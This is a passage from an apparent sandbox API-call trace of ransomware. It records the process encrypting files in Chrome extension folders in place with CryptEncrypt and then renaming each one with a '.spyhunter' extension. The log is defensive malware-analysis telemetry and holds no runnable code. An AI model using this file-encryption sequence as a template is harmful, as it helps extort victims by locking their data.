lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.613] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.614] WriteFile (in: hFile=0x180, lpBuffer=0x57f52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4ec, lpOverlapped=0x0 | out: lpBuffer=0x57f52c*, lpNumberOfBytesWritten=0x57f4ec*=0x4, lpOverlapped=0x0) returned 1 [0136.614] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4ec*=0x30, lpOverlapped=0x0) returned 1 [0136.614] CloseHandle (hObject=0x180) returned 1 [0136.615] GetProcessHeap () returned 0x2c0000 [0136.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.616] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.spyhunter") returned 165 [0136.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0136.616] GetProcessHeap () returned 0x2c0000 [0136.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.616] GetProcessHeap () returned 0x2c0000 [0136.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.617] GetProcessHeap () returned 0x2c0000 [0136.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0136.617] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f528 | out: pbBuffer=0x57f528) returned 1 [0136.617] GetProcessHeap () returned 0x2c0000 [0136.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.617] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f520*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f520*=0x30) returned 1 [0136.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0136.617] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.617] GetProcessHeap () returned 0x2c0000 [0136.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.618] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f4e4*=0xf6, lpOverlapped=0x0) returned 1 [0136.619] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.619] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f4e4*=0xf6, lpOverlapped=0x0) returned 1 [0136.619] GetProcessHeap () returned 0x2c0000 [0136.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.619] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.619] WriteFile (in: hFile=0x180, lpBuffer=0x57f524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x57f524*, lpNumberOfBytesWritten=0x57f4e4*=0x4, lpOverlapped=0x0) returned 1 [0136.619] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4e4*=0x30, lpOverlapped=0x0) returned 1 [0136.619] CloseHandle (hObject=0x180) returned 1 [0136.619] GetProcessHeap () returned 0x2c0000 [0136.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.619] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.spyhunter") returned 165 [0136.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0136.620] GetProcessHeap () returned 0x2c0000 [0136.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.620] GetProcessHeap () returned 0x2c0000 [0136.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.620] GetProcessHeap () returned 0x2c0000 [0136.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0136.620] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f528 | out: pbBuffer=0x57f528) returned 1 [0136.621] GetProcessHeap () returned 0x2c0000 [0136.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.621] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f520*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f520*=0x30) returned 1 [0136.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0136.621] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0136.621] GetProcessHeap () returned 0x2c0000 [0136.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.621] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f4e4*=0x5b, lpOverlapped=0x0) returned 1 [0136.623] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffffa5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.623] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f4e4*=0x5b, lpOverlapped=0x0) returned 1 [0136.623] GetProcessHeap () returned 0x2c0000 [0136.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.623] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.623] WriteFile (in: hFile=0x180, lpBuffer=0x57f524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x57f524*, lpNumberOfBytesWritten=0x57f4e4*=0x4, lpOverlapped=0x0) returned 1 [0136.635] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4e4*=0x30, lpOverlapped=0x0) returned 1 [0136.636] CloseHandle (hObject=0x180) returned 1 [0136.636] GetProcessHeap () returned 0x2c0000 [0136.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.636] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.spyhunter") returned 147 [0136.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.spyhunter")) returned 1 [0136.637] GetProcessHeap () returned 0x2c0000 [0136.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.637] GetProcessHeap () returned 0x2c0000 [0136.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.637] GetProcessHeap () returned 0x2c0000 [0136.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0136.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f520 | out: pbBuffer=0x57f520) returned 1 [0136.639] GetProcessHeap () returned 0x2c0000 [0136.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f518*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f518*=0x30) returned 1 [0136.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0136.640] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.640] GetProcessHeap () returned 0x2c0000 [0136.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.641] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f4dc*=0xd0, lpOverlapped=0x0) returned 1 [0136.642] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.642] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x57f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f4dc*=0xd0, lpOverlapped=0x0) returned 1 [0136.642] GetProcessHeap () returned 0x2c0000 [0136.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.642] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.642] WriteFile (in: hFile=0x180, lpBuffer=0x57f51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4dc, lpOverlapped=0x0 | out: lpBuffer=0x57f51c*, lpNumberOfBytesWritten=0x57f4dc*=0x4, lpOverlapped=0x0) returned 1 [0136.642] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4dc*=0x30, lpOverlapped=0x0) returned 1 [0136.643] CloseHandle (hObject=0x180) returned 1 [0136.643] GetProcessHeap () returned 0x2c0000 [0136.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.643] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.spyhunter") returned 165 [0136.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0136.644] GetProcessHeap () returned 0x2c0000 [0136.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.644] GetProcessHeap () returned 0x2c0000 [0136.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.644] GetProcessHeap () returned 0x2c0000 [0136.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0136.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f518 | out: pbBuffer=0x57f518) returned 1 [0136.645] GetProcessHeap () returned 0x2c0000 [0136.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f510*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f510*=0x30) returned 1 [0136.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.646] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0136.646] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.646] GetProcessHeap () returned 0x2c0000 [0136.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.646] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f4d4*=0xe5, lpOverlapped=0x0) returned 1 [0136.647] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.647] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x57f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f4d4*=0xe5, lpOverlapped=0x0) returned 1 [0136.648] GetProcessHeap () returned 0x2c0000 [0136.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.648] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.648] WriteFile (in: hFile=0x180, lpBuffer=0x57f514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4d4, lpOverlapped=0x0 | out: lpBuffer=0x57f514*, lpNumberOfBytesWritten=0x57f4d4*=0x4, lpOverlapped=0x0) returned 1 [0136.648] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4d4*=0x30, lpOverlapped=0x0) returned 1 [0136.648] CloseHandle (hObject=0x180) returned 1 [0136.648] GetProcessHeap () returned 0x2c0000 [0136.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.648] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.spyhunter") returned 165 [0136.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0136.649] GetProcessHeap () returned 0x2c0000 [0136.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.649] GetProcessHeap () returned 0x2c0000 [0136.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.649] GetProcessHeap () returned 0x2c0000 [0136.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d250 | out: hHeap=0x2c0000) returned 1 [0136.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f510 | out: pbBuffer=0x57f510) returned 1 [0136.649] GetProcessHeap () returned 0x2c0000 [0136.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.650] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f508*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f508*=0x30) returned 1 [0136.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.650] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0136.650] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0136.650] GetProcessHeap () returned 0x2c0000 [0136.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.650] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f4cc*=0x8f, lpOverlapped=0x0) returned 1 [0136.651] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.651] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x8f, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f4cc*=0x8f, lpOverlapped=0x0) returned 1 [0136.652] GetProcessHeap () returned 0x2c0000 [0136.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.652] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.652] WriteFile (in: hFile=0x180, lpBuffer=0x57f50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x57f50c*, lpNumberOfBytesWritten=0x57f4cc*=0x4, lpOverlapped=0x0) returned 1 [0136.652] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4cc*=0x30, lpOverlapped=0x0) returned 1 [0136.652] CloseHandle (hObject=0x180) returned 1 [0136.652] GetProcessHeap () returned 0x2c0000 [0136.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.652] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.spyhunter") returned 151 [0136.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.spyhunter" (normalized: 